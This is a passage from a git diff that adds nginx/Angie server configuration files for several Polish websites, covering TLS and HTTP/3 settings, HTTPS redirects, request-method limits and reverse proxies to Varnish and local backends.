b/scgi_params @@ -0,0 +1,17 @@ + +scgi_param REQUEST_METHOD $request_method; +scgi_param REQUEST_URI $request_uri; +scgi_param QUERY_STRING $query_string; +scgi_param CONTENT_TYPE $content_type; + +scgi_param DOCUMENT_URI $document_uri; +scgi_param DOCUMENT_ROOT $document_root; +scgi_param SCGI 1; +scgi_param SERVER_PROTOCOL $server_protocol; +scgi_param REQUEST_SCHEME $scheme; +scgi_param HTTPS $https if_not_empty; + +scgi_param REMOTE_ADDR $remote_addr; +scgi_param REMOTE_PORT $remote_port; +scgi_param SERVER_PORT $server_port; +scgi_param SERVER_NAME $server_name; diff --git a/sites-available/._linuxiarz.pl.conf b/sites-available/._linuxiarz.pl.conf new file mode 100755 index 0000000000000000000000000000000000000000..83aeeb234a4736221349a7975e6520602a0a4080 GIT binary patch literal 212 zcmZQz6=P>$Vqox1Ojhs@R)|o50+1L3ClDI}@gg7w@vi_e5x_AdBnYYuq+J^qI7A5ADWagzZ6zUroSQuKHrdb+TSemC;J7*N-=cZb_8k?IN lS-QIDI=fgJ>6)0EyXrbQn!4$_S(>>S8(A2+7#bQd004uLA7lUk literal 0 HcmV?d00001 diff --git a/sites-available/adphone.pl.conf b/sites-available/adphone.pl.conf new file mode 100644 index 0000000..8168dd0 --- /dev/null +++ b/sites-available/adphone.pl.conf @@ -0,0 +1,75 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name www.adphone.pl adphone.pl; + + ssl_dhparam /etc/ssl/certs/dhparam.pem; + ssl_ecdh_curve secp256r1; + ssl_prefer_server_ciphers on; + ssl_session_cache shared:SSL:10m; + ssl_ciphers "EECDH+AESGCM:EDH+AESGCM:ECDHE-RSA-AES128-GCM-SHA256:AES256+EECDH:DHE-RSA-AES128-GCM-SHA256:AES256+EDH:ECDHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA256:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA:ECDHE-RSA-DES-CBC3-SHA:EDH-RSA-DES-CBC3-SHA:AES256-GCM-SHA384:AES128-GCM-SHA256:AES256-SHA256:AES128-SHA256:AES256-SHA:AES128-SHA:DES-CBC3-SHA:HIGH:!aNULL:!eNULL:!EXPORT:!DES:!MD5:!PSK:!RC4"; + + status_zone adphone.pl; + # SSL + ssl_certificate /etc/ssl/adphone.pl/fullchain.pem; + ssl_certificate_key /etc/ssl/adphone.pl/privkey.pem; + + # logging + access_log /var/log/angie/adphone.pl.access.log main; + error_log /var/log/angie/adphone.pl.error.log warn; + + if ($host = 'www.adphone.pl') { + return 301 http://adphone.pl$request_uri; + } + + if ($request_method !~ ^(GET|HEAD|POST)$) { + return '405'; + } + + location / { + proxy_intercept_errors on; + proxy_set_header Host $host; + proxy_set_header X-Real-IP $remote_addr; + proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; + proxy_set_header X-Forwarded-Proto https; + proxy_pass http://127.0.0.1:8001; + proxy_request_buffering off; + client_body_timeout 120s; + proxy_read_timeout 120s; + proxy_connect_timeout 120s; + proxy_send_timeout 120s; + proxy_http_version 1.1; + } + + location /.well-known/acme-challenge/ { + root /var/www/_letsencrypt/; + try_files $uri =404; + } +} + +# HTTP redirect +server { + listen 80; + server_name adphone.pl www.adphone.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location /.well-known/acme-challenge/ { + root /var/www/_letsencrypt/; + try_files $uri =404; + } + + if ($scheme = 'http') { + return 301 https://adphone.pl$request_uri; + } +} + +# mkdir /etc/ssl/adphone.pl +# acme.sh --issue -d example.com -d www.example.com --webroot /var/www/_letsencrypt/ --cert-file /etc/ssl/adphone.pl/cert.pem --key-file /etc/ssl/adphone.pl/privkey.pem --fullchain-file /etc/ssl/adphone.pl/fullchain.pem + + diff --git a/sites-available/autodiscover.conf b/sites-available/autodiscover.conf new file mode 100644 index 0000000..430c611 --- /dev/null +++ b/sites-available/autodiscover.conf @@ -0,0 +1,46 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name autodiscover.linuxiarz.pl autodiscover.gruszczynski.eu.org autodiscover.gru.one.pl autodiscover.szczepaniak.eu.org; + set $base /var/www/autodiscover; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # logging + access_log /var/log/nginx/autodiscover.linuxiarz.pl.access.log; + error_log /var/log/nginx/autodiscover.linuxiarz.pl.error.log warn; + + + location ~ /(?:a|A)utodiscover/(?:a|A)utodiscover.xml { + rewrite .* /autodiscover/autodiscover.php redirect; + } + + # additional config + include config/general.conf; + + # handle .php + location ~* \.php$ { + include config/php_fastcgi.conf; + } + +} + +# HTTP redirect +server { + listen 80; + server_name autodiscover.linuxiarz.pl autodiscover.gruszczynski.eu.org autodiscover.gru.one.pl autodiscover.szczepaniak.eu.org; + add_header Alt-Svc 'h3=":443"; ma=86400'; + location / { + return 301 https://autodiscover.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/blog.linuxiarz.pl.conf b/sites-available/blog.linuxiarz.pl.conf new file mode 100644 index 0000000..8d4dc0c --- /dev/null +++ b/sites-available/blog.linuxiarz.pl.conf @@ -0,0 +1,82 @@ +server { + listen 8080; + server_name blog.linuxiarz.pl; + set $base /var/www/linuxiarz.pl; + root $base; + + # security +# include config/security_wp.conf; + + #disable on varnish + include config/wildcard.conf; + include config/security.conf; + include config/non-hotlink.conf; + + port_in_redirect off; + # restrict methods + if ($request_method !~ ^(GET|POST|HEAD|PUT|OPTIONS)$) { + return '405'; + } + + # logging + access_log /var/log/angie/blog.linuxiarz.pl.access.log main; + error_log /var/log/angie/blog.linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + + + # index.php fallback + location / { + try_files $uri $uri/ /index.php?$query_string; + + } + + # additional config + include config/general.conf; + include config/wordpress.conf; + include config/custom_linuxiarz.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} + + +server { + listen 443 quic reuseport; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name blog.linuxiarz.pl; + + include config/wildcard.conf; + + # logging + access_log /var/log/angie/blog.linuxiarz.pl.access.log main; + error_log /var/log/angie/blog.linuxiarz.pl.error.log warn; + + + location / { + proxy_pass http://127.0.0.1:6081/; + include config/proxy.conf; + } + +} + +# HTTP redirect +server { + listen 80; + server_name blog.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + location / { + return 301 https://blog.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/default b/sites-available/default new file mode 100644 index 0000000..c5af914 --- /dev/null +++ b/sites-available/default @@ -0,0 +1,91 @@ +## +# You should look at the following URL's in order to grasp a solid understanding +# of Nginx configuration files in order to fully unleash the power of Nginx. +# https://www.nginx.com/resources/wiki/start/ +# https://www.nginx.com/resources/wiki/start/topics/tutorials/config_pitfalls/ +# https://wiki.debian.org/Nginx/DirectoryStructure +# +# In most cases, administrators will remove this file from sites-enabled/ and +# leave it as reference inside of sites-available where it will continue to be +# updated by the nginx packaging team. +# +# This file will automatically load configuration files provided by other +# applications, such as Drupal or Wordpress. These applications will be made +# available underneath a path with that package name, such as /drupal8. +# +# Please see /usr/share/doc/nginx-doc/examples/ for more detailed examples. +## + +# Default server configuration +# +server { + listen 80 default_server; + listen [::]:80 default_server; + + # SSL configuration + # + # listen 443 ssl default_server; + # listen [::]:443 ssl default_server; + # + # Note: You should disable gzip for SSL traffic. + # See: https://bugs.debian.org/773332 + # + # Read up on ssl_ciphers to ensure a secure configuration. + # See: https://bugs.debian.org/765782 + # + # Self signed certs generated by the ssl-cert package + # Don't use them in a production server! + # + # include snippets/snakeoil.conf; + + root /var/www/html; + + # Add index.php to the list if you are using PHP + index index.html index.htm index.nginx-debian.html; + + server_name _; + + location / { + # First attempt to serve request as file, then + # as directory, then fall back to displaying a 404. + try_files $uri $uri/ =404; + } + + # pass PHP scripts to FastCGI server + # + #location ~ \.php$ { + # include snippets/fastcgi-php.conf; + # + # # With php-fpm (or other unix sockets): + # fastcgi_pass unix:/run/php/php7.4-fpm.sock; + # # With php-cgi (or other tcp sockets): + # fastcgi_pass 127.0.0.1:9000; + #} + + # deny access to .htaccess files, if Apache's document root + # concurs with nginx's one + # + #location ~ /\.ht { + # deny all; + #} +} + + +# Virtual Host configuration for example.com +# +# You can move that to a different file under sites-available/ and symlink that +# to sites-enabled/ to enable it. +# +#server { +# listen 80; +# listen [::]:80; +# +# server_name example.com; +# +# root /var/www/example.com; +# index index.html; +# +# location / { +# try_files $uri $uri/ =404; +# } +#} diff --git a/sites-available/default.conf b/sites-available/default.conf new file mode 100644 index 0000000..9536508 --- /dev/null +++ b/sites-available/default.conf @@ -0,0 +1,19 @@ +server { + listen 80 default_server ; + return 403; + if ($request_method !~ ^(HEAD)$) { + return '405'; + } +} + +server { + listen 443 ssl default_server; + return 403; + if ($request_method !~ ^(HEAD)$) { + return '405'; + } + + ssl_certificate /etc/nginx/ssl/nginx.crt; + ssl_certificate_key /etc/nginx/ssl/nginx.key; + ssl_stapling off; +} diff --git a/sites-available/doh.conf b/sites-available/doh.conf new file mode 100644 index 0000000..1eef6f9 --- /dev/null +++ b/sites-available/doh.conf @@ -0,0 +1,66 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + + server_name doh.linuxiarz.pl; + + set $base /var/www/dnsdist; + root $base; + + + include config/wildcard.conf; + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST|HEAD|PUT)$) { + return '405'; + } + + error_page 400 @echo_400; + + location @echo400 { + add_header Content-Type text/plain; + return 200 "Bad request :)"; + } + + + error_page 404 403 500 504 502 =200 /; + + # logging + access_log /var/log/nginx/doh.linuxiarz.pl.access.log; + error_log /var/log/nginx/doh.linuxiarz.pl.error.log warn; + + # additional config + include config/general.conf; + + location / { + proxy_pass https://127.0.0.1:8844/; + include config/proxy.conf; + } + + +} + +# HTTP redirect +server { + listen 80; + server_name doh.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + include config/letsencrypt.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://doh.linuxiarz.pl$request_uri; + } +} + diff --git a/sites-available/gitea.linuxiarz.pl.conf b/sites-available/gitea.linuxiarz.pl.conf new file mode 100644 index 0000000..e125fbd --- /dev/null +++ b/sites-available/gitea.linuxiarz.pl.conf @@ -0,0 +1,32 @@ +server { + + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=10000'; + server_name gitea.linuxiarz.pl; + include config/wildcard.conf; + + # logging + access_log /var/log/angie/gitea.linuxiarz.pl.access.log; + error_log /var/log/angie/gitea.linuxiarz.pl.error.log warn; + + location / { + proxy_pass http://127.0.0.1:3000/; + include config/proxy.conf; + } + +} + +# HTTP redirect +server { + listen 80; + server_name gitea.linuxiarz.pl; + + location / { + return 301 https://gitea.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/gruszczynski.cc.conf b/sites-available/gruszczynski.cc.conf new file mode 100644 index 0000000..aa677a0 --- /dev/null +++ b/sites-available/gruszczynski.cc.conf @@ -0,0 +1,97 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name www.gruszczynski.cc; + set $base /var/www/gruszczynski.cc; + root $base; + + ssl_certificate /etc/letsencrypt/live/gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/gruszczynski.eu.org/privkey.pem; + ssl_trusted_certificate /etc/letsencrypt/live/gruszczynski.eu.org/chain.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + error_page 404 403 500 504 502 =200 /; + + # logging + access_log /var/log/nginx/gruszczynski.cc.access.log; + error_log /var/log/nginx/gruszczynski.cc.error.log warn; + + # index.html + index index.html; + + # additional config + include config/general.conf; + + # letsencrypt + include config/letsencrypt.conf; + + # handle .php +# location ~ \.php$ { +# include config/php_fastcgi.conf; +# } +} + +# HTTP redirect +server { + listen 80; + server_name gruszczynski.cc www.gruszczynski.cc; + add_header Alt-Svc 'h3=":443"; ma=86400'; + include config/letsencrypt.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://www.gruszczynski.cc$request_uri; + } +} + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + + server_name gruszczynski.cc; + + ssl_certificate /etc/letsencrypt/live/gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/gruszczynski.eu.org/privkey.pem; + ssl_trusted_certificate /etc/letsencrypt/live/gruszczynski.eu.org/chain.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://www.gruszczynski.cc$request_uri; + } +} diff --git a/sites-available/gruszczynski.eu.org.conf b/sites-available/gruszczynski.eu.org.conf new file mode 100644 index 0000000..3da1dec --- /dev/null +++ b/sites-available/gruszczynski.eu.org.conf @@ -0,0 +1,80 @@ +server { + listen 443 ssl http2; + server_name www.gruszczynski.eu.org; + set $base /var/www/gruszczynski.eu.org; + root $base; + + ssl_certificate /etc/letsencrypt/live/gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/gruszczynski.eu.org/privkey.pem; + ssl_trusted_certificate /etc/letsencrypt/live/gruszczynski.eu.org/chain.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/gruszczynski.eu.org.access.log; + error_log /var/log/nginx/gruszczynski.eu.org.error.log warn; + + # index.php + index index.php index.html; + + # additional config + include config/general.conf; + + # letsencrypt + include config/letsencrypt.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} + +# HTTP redirect +server { + listen 80; + server_name gruszczynski.eu.org www.gruszczynski.eu.org; + + include config/letsencrypt.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://www.gruszczynski.eu.org$request_uri; + } +} + +server { + listen 443 ssl http2; + server_name gruszczynski.eu.org; + + ssl_certificate /etc/letsencrypt/live/gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/gruszczynski.eu.org/privkey.pem; + ssl_trusted_certificate /etc/letsencrypt/live/gruszczynski.eu.org/chain.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://www.gruszczynski.eu.org$request_uri; + } +} diff --git a/sites-available/gruszczynski.eu.org_varnish.conf b/sites-available/gruszczynski.eu.org_varnish.conf new file mode 100644 index 0000000..8723a62 --- /dev/null +++ b/sites-available/gruszczynski.eu.org_varnish.conf @@ -0,0 +1,110 @@ +server { + listen 8080; + server_name www.gruszczynski.eu.org; + set $base /var/www/gruszczynski.eu.org; + root $base; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + #access_log /var/log/nginx/gruszczynski.eu.org.access.log; + #error_log /var/log/nginx/gruszczynski.eu.org.error.log warn; + + # index.php + index index.php index.html; + + # additional config + include config/general.conf; + + # letsencrypt + include config/letsencrypt.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name www.gruszczynski.eu.org; + + ssl_certificate /etc/letsencrypt/live/gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/gruszczynski.eu.org/privkey.pem; + ssl_trusted_certificate /etc/letsencrypt/live/gruszczynski.eu.org/chain.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + + location / { + proxy_pass http://127.0.0.1:6081/; + include config/proxy.conf; + } + +} + + + + +# HTTP redirect +server { + listen 80; + add_header Alt-Svc 'h3=":443"; ma=86400'; + server_name gruszczynski.eu.org www.gruszczynski.eu.org; + + include config/letsencrypt.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://www.gruszczynski.eu.org$request_uri; + } +} + +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name gruszczynski.eu.org; + + ssl_certificate /etc/letsencrypt/live/gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/gruszczynski.eu.org/privkey.pem; + ssl_trusted_certificate /etc/letsencrypt/live/gruszczynski.eu.org/chain.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://www.gruszczynski.eu.org$request_uri; + } +} diff --git a/sites-available/img.gruszczynski.eu.org.conf b/sites-available/img.gruszczynski.eu.org.conf new file mode 100644 index 0000000..8f7285c --- /dev/null +++ b/sites-available/img.gruszczynski.eu.org.conf @@ -0,0 +1,63 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name img.gruszczynski.eu.org; + set $base /var/www/img.gruszczynski.eu.org; + root $base/img; + + ssl_certificate /etc/letsencrypt/live/img.gruszczynski.eu.org/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/img.gruszczynski.eu.org/privkey.pem; + ssl_trusted_certificate /etc/letsencrypt/live/img.gruszczynski.eu.org/chain.pem; + + # ssl cfg + include config/ssl_cfg.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/img.gruszczynski.eu.org.access.log; + error_log /var/log/nginx/img.gruszczynski.eu.org.error.log warn; + + include config/general.conf; + + # letsencrypt + include config/letsencrypt.conf; + +} + +# HTTP redirect +server { + listen 80; + server_name img.gruszczynski.eu.org; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + set $base /var/www/img.gruszczynski.eu.org; + root $base/img; + + include config/letsencrypt.conf; + + # logging + access_log /var/log/nginx/img.gruszczynski.eu.org.access.log; + error_log /var/log/nginx/img.gruszczynski.eu.org.error.log warn; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://img.gruszczynski.eu.org$request_uri; + } +} diff --git a/sites-available/kodi.linuxiarz.pl.conf b/sites-available/kodi.linuxiarz.pl.conf new file mode 100644 index 0000000..f049b3d --- /dev/null +++ b/sites-available/kodi.linuxiarz.pl.conf @@ -0,0 +1,54 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name kodi.linuxiarz.pl; + set $base /var/www/kodi.linuxiarz.pl/; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + autoindex on; + autoindex_exact_size off; + autoindex_localtime off; + autoindex_format html; + } + + # additional config + include config/general.conf; + +} + +# HTTP redirect +server { + listen 80; + server_name kodi.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://kodi.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/kompilacje.linuxiarz.pl.conf b/sites-available/kompilacje.linuxiarz.pl.conf new file mode 100644 index 0000000..aed6a43 --- /dev/null +++ b/sites-available/kompilacje.linuxiarz.pl.conf @@ -0,0 +1,54 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name kompilacje.linuxiarz.pl; + set $base /var/www/kompilacje.linuxiarz.pl/; + root $base; + + include config/wildcard.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log off; + error_log off; + + location / { + autoindex on; + autoindex_exact_size off; + autoindex_localtime off; + autoindex_format html; + } + + # additional config + include config/general.conf; + +} + +# HTTP redirect +server { + listen 80; + server_name kompilacje.linuxiarz.pl; + add_header Alt-Svc 'h3=":443"; ma=86400'; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://kompilacje.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/kutagroup.pl.conf b/sites-available/kutagroup.pl.conf new file mode 100644 index 0000000..245d99c --- /dev/null +++ b/sites-available/kutagroup.pl.conf @@ -0,0 +1,133 @@ +server { + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":$server_port"; ma=86400'; + + server_name *.kutagroup.pl www.kutagroup.pl kutagroup.pl; + set $base /var/www/kutagroup.pl/; + root $base; + ssl_certificate /etc/letsencrypt/live/kutagroup.pl/fullchain.pem; # managed by Certbot + ssl_certificate_key /etc/letsencrypt/live/kutagroup.pl/privkey.pem; # managed by Certbot + + if ($host = kutagroup.pl) { + return 301 https://www.kutagroup.pl$request_uri; + } + + # ssl cfg + include config/ssl_cfg.conf; + + # security + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/kutagroup.pl.log; + error_log /var/log/nginx/kutagroup.pl.error.log warn; + + # index.html + index index.html; + + # additional config + include config/general.conf; +} + +server { + listen 80; + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":443"; ma=86400'; + ssl_certificate /etc/letsencrypt/live/kutagroup.pl/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/kutagroup.pl/privkey.pem; + + server_name kutaadmin.kutagroup.pl; + return 301 $scheme://www.kutagroup.pl/kutaadmin$request_uri; +} +server { + listen 80; + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":443"; ma=86400'; + ssl_certificate /etc/letsencrypt/live/kutagroup.pl/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/kutagroup.pl/privkey.pem; + + server_name kutanet.kutagroup.pl; + return 301 $scheme://www.kutagroup.pl/kutanet$request_uri; +} +server { + listen 80; + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":443"; ma=86400'; + ssl_certificate /etc/letsencrypt/live/kutagroup.pl/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/kutagroup.pl/privkey.pem; + + server_name kutasort.kutagroup.pl; + return 301 $scheme://www.kutagroup.pl/kutasort$request_uri; +} +server { + listen 80; + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":443"; ma=86400'; + ssl_certificate /etc/letsencrypt/live/kutagroup.pl/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/kutagroup.pl/privkey.pem; + + server_name kutafalcon.kutagroup.pl; + return 301 $scheme://www.kutagroup.pl/kutafalcon$request_uri; +} +server { + listen 80; + listen 443 quic; + listen 443 ssl; + http2 on; + http3 on; + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + add_header Alt-Svc 'h3=":443"; ma=86400'; + ssl_certificate /etc/letsencrypt/live/kutagroup.pl/fullchain.pem; + ssl_certificate_key /etc/letsencrypt/live/kutagroup.pl/privkey.pem; + + server_name kutaserwis.kutagroup.pl; + return 301 $scheme://www.kutagroup.pl/kutaserwis$request_uri; +} + +# HTTP redirect +server { + server_name kutagroup.pl *.kutagroup.pl; + listen 80; + + # restrict methods + if ($request_method !~ ^(GET)$) { + return '405'; + } + + location / { + return 301 https://www.kutagroup.pl$request_uri; + } + +} + diff --git a/sites-available/linuxiarz.pl.conf b/sites-available/linuxiarz.pl.conf new file mode 100755 index 0000000..1a61963 --- /dev/null +++ b/sites-available/linuxiarz.pl.conf @@ -0,0 +1,82 @@ +server { + listen 443 ssl http2; + server_name www.linuxiarz.pl; + set $base /var/www/linuxiarz.pl; + root $base; + + # security +#disable on varnish + include config/security_wp.conf; + + #disable on varnish + include config/wildcard.conf; + include config/security.conf; + + # restrict methods + if ($request_method !~ ^(GET|POST|HEAD|PUT)$) { + return '405'; + } + + # logging + access_log /var/log/nginx/linuxiarz.pl.access.log; + error_log /var/log/nginx/linuxiarz.pl.error.log warn; + + # index.php + index index.php; + + # index.php fallback + location / { + try_files $uri $uri/ /index.php?$query_string; + } + + # additional config + include config/general.conf; + include config/wordpress.conf; + include config/custom_linuxiarz.conf; + + # handle .php + location ~ \.php$ { + include config/php_fastcgi.conf; + } +} + + +server { + listen 8442 ssl http2; + server_name www.linuxiarz.pl; + + include config/wildcard.conf; + + # logging + access_log /var/log/nginx/linuxiarz.pl.access.log; + error_log /var/log/nginx/linuxiarz.pl.error.log warn; + + + location / { + proxy_pass http://127.0.0.1:6081/; + include config/proxy.conf; + } + +} + +# HTTP redirect +server { + listen 80; + server_name www.linuxiarz.pl linuxiarz.pl; + + location / { + return 301 https://www.linuxiarz.pl$request_uri; + } +} + +server { + listen 443 ssl http2; + server_name linuxiarz.pl; + + include config/wildcard.conf; + include config/security.conf; + + location / { + return 301 https://www.linuxiarz.pl$request_uri; + } +} diff --git a/sites-available/linuxiarz.pl_new.conf b/sites-available/linuxiarz.pl_new.conf new file mode 100644 index 0000000..bc64e49 --- /dev/null +++ b/sites-available/linuxiarz.pl_new.conf @@ -0,0 +1,156 @@ +# Cache (jak w oryginale) +proxy_cache_path /var/cache/angie/redirector + levels=1:2 + keys_zone=redirect_cache:10m + max_size=100m + inactive=24h + use_temp_path=off; + +############################## +# 1) Blok tylko do redirectów +############################## + +# HTTP -> HTTPS + normalizacja do www +server { + listen 80; + server_name linuxiarz.pl www.linuxiarz.pl; + + # Ścieżkowe redirecty z HTTP prosto do docelowych hostów + rewrite ^/sk/?$ https://sk.linuxiarz.pl/ permanent; + rewrite ^/feed/?$ https://blog.linuxiarz.pl/feed/ permanent; + + # Reszta na HTTPS z www + return 301 https://www.linuxiarz.pl$request_uri; +} + +# HTTPS non‑www -> www (tylko redirect) +server { + listen 443 ssl; + server_name linuxiarz.pl; + + include config/wildcard.conf; + + ssl_protocols TLSv1.3 TLSv1.2; + + # Bez Alt-Svc tutaj: ten blok tylko przekierowuje + return 301 https://www.linuxiarz.pl$request_uri; +} + +######################################### +# 2) Główny vhost treści: www + HTTP/3 +######################################### +server { + # TCP (HTTP/1.1 + HTTP/2) + listen 443 ssl; + http2 on; + + # UDP (QUIC + HTTP/3) + listen 443 quic; + http3 on; + + ssl_protocols TLSv1.3 TLSv1.2; + ssl_early_data on; + + # Alt-Svc tylko tu, gdzie serwowana jest treść + add_header Alt-Svc 'h3=":443"; ma=86400'; + + server_name www.linuxiarz.pl; + + include config/wildcard.conf; + + # logging + access_log /var/log/angie/linuxiarz.pl.access.log main; + error_log /var/log/angie/linuxiarz.pl.error.log warn; + + status_zone www.linuxiarz.pl; + # Dozwolone metody + if ($request_method !~ ^(GET|HEAD|POST)$) { + return 405; + } + + # Ścieżkowe redirecty również z HTTPS na www + rewrite ^/sk/?$ https://sk.linuxiarz.pl/ permanent; + rewrite ^/feed/?$ https://blog.linuxiarz.pl/feed/ permanent; + + # Główne proxy do Varnish na 6081 + location / { + proxy_pass http://127.0.0.1:6081/; + include config/proxy.conf; + } + + # Przykład ads.txt (opcjonalnie): + # location = /ads.txt { root /var/www/ads; } +} + +################################## +# 3) Backend HTTP na porcie 8080 +################################## +server { + listen 8080; + server_name www.linuxiarz.pl linuxiarz.pl; + + # Domyślna ścieżka: pliki -> fallback do aplikacji na :8000 + error_page 404 = @redirect_check; + + location / { + try_files $uri $uri/ @to8000; + } + + location @to8000 { + proxy_intercept_errors on; # pozwala przechwycić 404/5xx i skierować do @redirect_check + proxy_set_header Host $host; + proxy_set_header X-Real-IP 